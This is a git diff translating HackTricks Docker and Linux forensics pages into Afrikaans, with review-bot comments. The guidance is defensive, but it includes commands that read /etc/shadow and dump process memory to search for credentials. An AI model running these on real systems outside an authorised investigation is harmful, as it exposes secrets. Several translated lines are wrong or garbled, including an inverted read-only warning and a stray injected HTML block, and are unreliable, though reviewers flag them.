-## Container modification - -There are suspicions that some docker container was compromised: +## Houer-wysiging +Daar is vermoedens dat 'n sekere Docker-houer gekompromitteer is: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` - -You can easily **find the modifications done to this container with regards to the image** with: - +Jy kan maklik **die wysigings wat aan hierdie houer gedoen is met betrekking tot die prent** vind met: ```bash docker diff wordpress C /var 
@@ -39,70 +36,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` - -In the previous command **C** means **Changed** and **A,** **Added**.\ -If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with: - +In die vorige opdrag beteken **C** **Veranderd** en **A,** **Bygevoeg**.\ +As jy vind dat 'n interessante lêer soos `/etc/shadow` gewysig is, kan jy dit van die houer aflaai om vir skadelike aktiwiteit te ondersoek met: ```bash docker cp wordpress:/etc/shadow. ``` - -You can also **compare it with the original one** running a new container and extracting the file from it: - +Jy kan dit ook **vergelyk met die oorspronklike een** deur 'n nuwe houer te hardloop en die lêer daaruit te onttrek: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` - -If you find that **some suspicious file was added** you can access the container and check it: - +As jy vind dat **'n verdagte lêer bygevoeg is**, kan jy toegang verkry tot die houer en dit nagaan: ```bash docker exec -it wordpress bash ``` +## Beeldwysigings -## Images modifications - -When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**: - +Wanneer jy 'n uitgevoerde docker-beeld (waarskynlik in `.tar`-formaat) ontvang, kan jy [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) gebruik om 'n opsomming van die wysigings te **onttrek**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` - -Then, you can **decompress** the image and 
**access the blobs** to search for suspicious files you may have found in the changes history: - +Dan kan jy die prentjie **ontplooi** en **toegang verkry tot die blobs** om te soek na verdagte lêers wat jy dalk in die veranderingsgeskiedenis gevind het: ```bash tar -xf image.tar ``` +### Basiese Analise -### Basic Analysis - -You can get **basic information** from the image running: - +Jy kan **basiese inligting** kry van die lopende prentjie: ```bash -docker inspect +docker inspect ``` - -You can also get a summary **history of changes** with: - +Jy kan ook 'n opsomming van die **geskiedenis van veranderinge** kry met: ```bash docker history --no-trunc ``` - -You can also generate a **dockerfile from an image** with: - +Jy kan ook 'n **dockerfile van 'n prentjie** genereer met: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` +### Duik -### Dive - -In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility: - +Om bygevoegde/gewysigde lêers in Docker-beelde te vind, kan jy ook die [**duik**](https://github.com/wagoodman/dive) (laai dit af vanaf [**vrystellings**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) nut gebruik: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ 
@@ -111,33 +90,30 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` +Dit stel jou in staat om **deur die verskillende blobs van Docker-beelde te blaai** en te kyk watter lêers gewysig/toegevoeg is. **Rooi** beteken toegevoeg en **geel** beteken gewysig. Gebruik **tab** om na die ander aansig te skuif en **spasie** om vouers in/uit te vou. -This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders. - -With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\ -You can decompress all the layers from an image from the directory where the image was decompressed executing: - +Met die sal jy nie toegang tot die inhoud van die verskillende fases van die beeld hê nie. Om dit te doen, sal jy elke laag moet dekomprimeer en toegang daartoe hê.\ +Jy kan al die lae van 'n beeld dekomprimeer vanuit die gids waar die beeld gedekomprimeer is deur die volgende uit te voer: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` +## Legitieme inligting uit geheue -## Credentials from memory +Let daarop dat wanneer jy 'n docker-houer binne 'n gasheer uitvoer, **kan jy die prosesse wat op die houer loop vanaf die gasheer sien** deur eenvoudig `ps -ef` uit te voer. -Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef` - -Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). 
+Daarom kan jy (as root) **die geheue van die prosesse uit die gasheer dump** en soek na **legitieme inligting** net [**soos in die volgende voorbeeld**](../../linux-hardening/privilege-escalation/#process-memory).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil hê jou **maatskappy geadverteer moet word in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 4e75ea70e..30b18e95f 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,56 +1,52 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# Baseline -A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**. +'n Baselyn bestaan uit die neem van 'n oorsig van sekere dele van 'n stelsel om dit met 'n toekomstige status te **vergelyk om veranderinge te beklemtoon**. -For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\ -This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. +Byvoorbeeld, jy kan die has van elke lêer in die lêersisteem bereken en stoor om uit te vind watter lêers gewysig is.\ +Dit kan ook gedoen word met die gebruikersrekeninge wat geskep is, prosesse wat loop, dienste wat loop en enige ander ding wat nie baie of glad nie moet verander nie. -## File Integrity Monitoring +## Lêerintegriteitsmonitering -File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: +Lêerintegriteitsmonitering (FIM) is 'n kritieke sekuriteitstegniek wat IT-omgewings en data beskerm deur veranderinge in lêers te volg. Dit behels twee sleutelstappe: -1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. -2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. +1. **Baselynvergelyking:** Stel 'n baselyn vas deur lêereienskappe of kriptografiese kontrolesomme (soos MD5 of SHA-2) te gebruik vir toekomstige vergelykings om wysigings op te spoor. +2. **Real-Time Veranderingskennisgewing:** Kry onmiddellike waarskuwings wanneer lêers geopen of gewysig word, tipies deur bedryfstelsel-kerneluitbreidings. 
-## Tools +## Gereedskap * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -## References +## Verwysings * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index e55a5824b..cdbb6c663 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,40 +1,36 @@ -# Linux Forensics +# Linux Forensika
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
-## Initial Information Gathering +## Aanvanklike Inligting Versameling -### Basic Information - -First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries: +### Basiese Inligting +Eerstens word dit aanbeveel om 'n **USB** te hê met **bekende goeie binêre en biblioteke daarop** (jy kan net Ubuntu kry en die _/bin_, _/sbin_, _/lib,_ en _/lib64_ lêers kopieer), monteer dan die USB en wysig die omgewingsveranderlikes om daardie binêre te gebruik: ```bash export PATH=/mnt/usb/bin:/mnt/usb/sbin export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 ``` - -Once you have configured the system to use good and known binaries you can start **extracting some basic information**: - +Sodra jy die stelsel gekonfigureer het om goeie en bekende binaire lêers te gebruik, kan jy begin met die **onttrekking van basiese inligting**: ```bash date #Date and time (Clock may be skewed, Might be at a different timezone) uname -a #OS info 
@@ -52,51 +48,47 @@ cat /etc/passwd #Unexpected data? cat /etc/shadow #Unexpected data? find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory ``` +#### Verdagte inligting -#### Suspicious information +Terwyl jy die basiese inligting bekom, moet jy kyk vir vreemde dinge soos: -While obtaining the basic information you should check for weird things like: +* **Root prosesse** loop gewoonlik met lae PIDS, so as jy 'n root proses vind met 'n groot PID, kan jy vermoed +* Kyk na **geregistreerde aanmeldings** van gebruikers sonder 'n skulp binne `/etc/passwd` +* Kyk vir **wagwoordhasings** binne `/etc/shadow` vir gebruikers sonder 'n skulp -* **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect -* Check **registered logins** of users without a shell inside `/etc/passwd` -* Check for **password hashes** inside `/etc/shadow` for users without a shell +### Geheue Dump -### Memory Dump - -To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ -To **compile** it, you need to use the **same kernel** that the victim machine is using. +Om die geheue van die lopende stelsel te verkry, word dit aanbeveel om [**LiME**](https://github.com/504ensicsLabs/LiME) te gebruik.\ +Om dit te **kompileer**, moet jy dieselfde kernel gebruik as die slagoffer se masjien. {% hint style="info" %} -Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it +Onthou dat jy **nie LiME of enige ander ding** op die slagoffer se masjien kan installeer nie, aangesien dit verskeie veranderinge daaraan sal maak. {% endhint %} -So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\ -In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. 
To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them: - +As jy 'n identiese weergawe van Ubuntu het, kan jy `apt-get install lime-forensics-dkms` gebruik.\ +In ander gevalle moet jy [**LiME**](https://github.com/504ensicsLabs/LiME) van GitHub aflaai en dit met die korrekte kernelkoppele kompilleer. Om die presiese kernelkoppele van die slagoffer se masjien te verkry, kan jy eenvoudig die gids `/lib/modules/` na jou masjien kopieer en dan LiME daarmee kompilleer: ```bash make -C /lib/modules//build M=$PWD sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" ``` +LiME ondersteun 3 **formate**: -LiME supports 3 **formats**: +* Roh (elke segment saamgevoeg) +* Gepad (soortgelyk aan roh, maar met nulle in die regterbits) +* Lime (aanbevole formaat met metadata) -* Raw (every segment concatenated together) -* Padded (same as raw, but with zeroes in right bits) -* Lime (recommended format with metadata +LiME kan ook gebruik word om die dump **via die netwerk te stuur** in plaas daarvan om dit op die stelsel te stoor deur iets soos te gebruik: `path=tcp:4444` -LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` +### Skyskaping -### Disk Imaging +#### Afskakeling -#### Shutting down +Eerstens, sal jy die stelsel moet **afskaal**. Dit is nie altyd 'n opsie nie, aangesien die stelsel soms 'n produksieserver kan wees wat die maatskappy nie kan bekostig om af te skaal nie.\ +Daar is **2 maniere** om die stelsel af te skaal, 'n **normale afskakeling** en 'n **"trek die prop uit" afskakeling**. Die eerste een sal die **prosesse toelaat om soos gewoonlik te beëindig** en die **lêersisteem** om **gelyk te maak**, maar dit sal ook die moontlike **malware** toelaat om **bewyse te vernietig**. 
Die "trek die prop uit" benadering mag 'n **sekere verlies van inligting** meebring (nie baie van die inligting gaan verlore gaan nie aangesien ons reeds 'n beeld van die geheue geneem het nie) en die **malware sal geen geleentheid hê** om iets daaraan te doen nie. Daarom, as jy **vermoed** dat daar 'n **malware** mag wees, voer net die **`sync`** **opdrag** op die stelsel uit en trek die prop uit. -First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\ -There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. - -#### Taking an image of the disk - -It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information. +#### Neem 'n beeld van die skyf +Dit is belangrik om daarop te let dat **voordat jy jou rekenaar aan iets wat met die saak verband hou, koppel**, jy moet seker maak dat dit as **alleen-lees** gemonteer gaan word om enige inligting te verander. ```bash #Create a raw copy of the disk dd if= of= bs=512 
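Review bot: the translated sentence under `+#### Neem 'n beeld van die skyf` inverts the meaning of the source: `+... jy moet seker maak dat dit as **alleen-lees** gemonteer gaan word om enige inligting te verander.` says "to change any information", whereas the English is "to avoid modifying any information"; it should read "om te verhoed dat enige inligting verander word". In the same hunk, "afskaal" (scale down) is used three times for "shut down"; the heading itself already uses "Afskakeling", so use "afskakel" consistently, and "Skyskaping" for "Disk Imaging" should be "Skyfbeelding". "kernelkoppele" for "kernel headers" should be "kernelkoplêers", and "Roh" in the LiME format list is German; the Afrikaans is "Rou". The double negative in `+... (nie baie van die inligting gaan verlore gaan nie aangesien ons reeds 'n beeld van die geheue geneem het nie)` is ungrammatical; "(nie veel inligting gaan verlore nie, aangesien ons reeds 'n beeld van die geheue geneem het)" keeps the meaning. Finally, the untranslated context comment on `find /directory -type f -mtime -1 -print #Find modified files during the last minute` is wrong in the source as well: `-mtime -1` matches files modified within the last 24 hours; `-mmin -1` is the last minute. Worth correcting while this block is being touched.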
@@ -105,35 +97,33 @@ dd if= of= bs=512 dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` +### Voor-analise van skijfafbeelding -### Disk Image pre-analysis - -Imaging a disk image with no more data. - +Beeld 'n skijfafbeelding af sonder enige verdere data. ```bash #Find out if it's a disk image using "file" command -file disk.img +file disk.img disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files) #Check which type of disk image it's -img_stat -t evidence.img +img_stat -t evidence.img raw #You can list supported types with img_stat -i list Supported image format types: - raw (Single or split raw file (dd)) - aff (Advanced Forensic Format) - afd (AFF Multiple File) - afm (AFF with external metadata) - afflib (All AFFLIB image formats (including beta ones)) - ewf (Expert Witness Format (EnCase)) +raw (Single or split raw file (dd)) +aff (Advanced Forensic Format) +afd (AFF Multiple File) +afm (AFF with external metadata) +afflib (All AFFLIB image formats (including beta ones)) +ewf (Expert Witness Format (EnCase)) #Data of the image -fsstat -i raw -f ext4 disk.img +fsstat -i raw -f ext4 disk.img FILE SYSTEM INFORMATION -------------------------------------------- File System Type: Ext4 -Volume Name: +Volume Name: Volume ID: 162850f203fd75afab4f1e4736a7e776 Last Written at: 2020-02-06 06:22:48 (UTC) @@ -162,42 +152,39 @@ r/r 16: secret.txt icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Search for known Malware +## Soek na bekende Malware -### Modified System Files +### Gewysigde Sisteemlêers -Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files. +Linux bied gereedskap om die integriteit van sisteemkomponente te verseker, wat belangrik is om potensieel problematiese lêers op te spoor. -- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check. -- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues. +- **RedHat-gebaseerde stelsels**: Gebruik `rpm -Va` vir 'n omvattende ondersoek. +- **Debian-gebaseerde stelsels**: `dpkg --verify` vir aanvanklike verifikasie, gevolg deur `debsums | grep -v "OK$"` (nadat `debsums` geïnstalleer is met `apt-get install debsums`) om enige probleme te identifiseer. 
-### Malware/Rootkit Detectors +### Malware/Rootkit Detekteerders -Read the following page to learn about tools that can be useful to find malware: +Lees die volgende bladsy om meer te wete te kom oor gereedskap wat nuttig kan wees om malware op te spoor: {% content-ref url="malware-analysis.md" %} [malware-analysis.md](malware-analysis.md) {% endcontent-ref %} -## Search installed programs +## Soek geïnstalleerde programme -To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories. +Om doeltreffend te soek na geïnstalleerde programme op beide Debian- en RedHat-stelsels, oorweeg om stelsellogboeke en databasisse saam met handmatige kontroles in algemene gidslys te gebruik. -- For Debian, inspect **_`/var/lib/dpkg/status`_** and **_`/var/log/dpkg.log`_** to fetch details about package installations, using `grep` to filter for specific information. +- Vir Debian, ondersoek **_`/var/lib/dpkg/status`_** en **_`/var/log/dpkg.log`_** om besonderhede oor pakketaanbringings te verkry, deur `grep` te gebruik om te filtreer vir spesifieke inligting. -- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages. - -To uncover software installed manually or outside of these package managers, explore directories like **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, and **_`/sbin`_**. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs. +- RedHat-gebruikers kan die RPM-databasis ondervra met `rpm -qa --root=/mntpath/var/lib/rpm` om geïnstalleerde pakkette te lys. 
+Om sagteware wat handmatig of buite hierdie pakketsbestuurders geïnstalleer is, op te spoor, verken gidslyste soos **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, en **_`/sbin`_**. Kombineer gidslyste met stelselspesifieke opdragte om uitvoerbare lêers te identifiseer wat nie met bekende pakkette geassosieer word nie, en verbeter soek na alle geïnstalleerde programme. ```bash # Debian package and log details cat /var/lib/dpkg/status | grep -E "Package:|Status:" @@ -213,30 +200,46 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" # Find exacuable files find / -type f -executable | grep ``` - -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Recover Deleted Running Binaries - -Imagina a process taht was executed from /tmp/exec and deleted. It's possible to extract it +## Herstel Verwyderde Lopende Binêre Lêers +Stel jou voor 'n proses wat uitgevoer is vanaf /tmp/exec en verwyder is. Dit is moontlik om dit te onttrek. ```bash cd /proc/3746/ #PID with the exec file deleted head -1 maps #Get address of the file. It was 08048000-08049000 dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it ``` +## Inspekteer Autostart-plekke -## Inspect Autostart locations +### Geskeduleerde Take -### Scheduled Tasks +```html +Scheduled tasks are a common way for programs to run automatically at specific times or intervals. In Linux, the cron daemon is responsible for managing scheduled tasks. To inspect scheduled tasks, you can check the contents of the `/etc/cron.d/` directory and the user-specific cron files located in `/var/spool/cron/crontabs/`. +To view the contents of the `/etc/cron.d/` directory, you can use the following command: + +```bash +ls -l /etc/cron.d/ +``` + +This will display a list of files that correspond to scheduled tasks. Each file represents a separate task and contains the command to be executed and the schedule for when it should run. 
+ +To view the user-specific cron files, you can use the following command: + +```bash +ls -l /var/spool/cron/crontabs/ +``` + +This will display a list of files that correspond to the cron files for each user. Each file represents a separate user and contains their individual scheduled tasks. + +Inspecting these autostart locations can help identify any suspicious or unauthorized tasks that may be running on the system. +``` ```bash cat /var/spool/cron/crontabs/* \ /var/spool/cron/atjobs \ 
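Review bot: the `+### Geskeduleerde Take` section gains a new ```html fenced block of English explanatory text about cron that does not exist in the source file and nests ```bash fences inside it; markdown closes the outer block at the first inner ``` (after `ls -l /etc/cron.d/`), so everything after it renders as raw text and the real `cat /var/spool/cron/crontabs/*` block below is thrown off. This looks like model output that leaked into the translation. Drop every `+` line from `+```html` through the `+```` that immediately precedes the original ```bash block, and keep only the original cron/at listing; the translated heading `+### Geskeduleerde Take` should be followed directly by that code block, as in the English.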
